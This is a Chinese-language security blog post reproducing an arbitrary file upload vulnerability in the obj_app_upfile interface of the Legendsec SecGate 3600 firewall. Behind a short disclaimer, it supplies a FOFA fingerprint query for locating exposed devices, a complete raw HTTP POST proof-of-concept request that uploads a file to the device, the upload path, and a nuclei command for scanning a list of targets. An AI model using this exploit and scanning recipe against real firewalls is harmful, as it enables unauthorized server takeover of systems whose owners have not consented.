正文

漏洞复现 网神 SecGate 3600 防火墙任意文件上传漏洞

admin
admin V管理员 /0 评论 /97 阅读
0514
此篇文章发布距今已超过192天,您需要注意文章的内容或图片是否可用!

0x01 阅读须知

云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

0x02 漏洞描述

网神 SecGate 3600 防火墙  obj_app_upfile 接口存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。

0x03 漏洞复现

fofa-qeury: fid="1Lh1LHi6yfkhiO83I59AYg=="

1.执行poc上传txt文档,并访问该txt

1.POCPOST /?g=obj_app_upfile HTTP/1.1Host: User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)Connection: closeContent-Length: 549Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="MAX_FILE_SIZE"10000000------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="upfile"; filename="{{文件名}}.txt"Content-Type: text/plain2317852------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="submit_post"obj_app_upfile------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="__hash__"0b9d6b1ab7479ab69d9f71b05e0e9445------WebKitFormBoundaryJpMyThWnAxbcBBQc--2.上传路径/attachements/{{文件名}}.txt

2.nuclei验证脚本已发表于知识星球

nuclei.exe -t wangshen-secgate-objappupfile-fileupload.yaml -l subs.txt -stats


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下网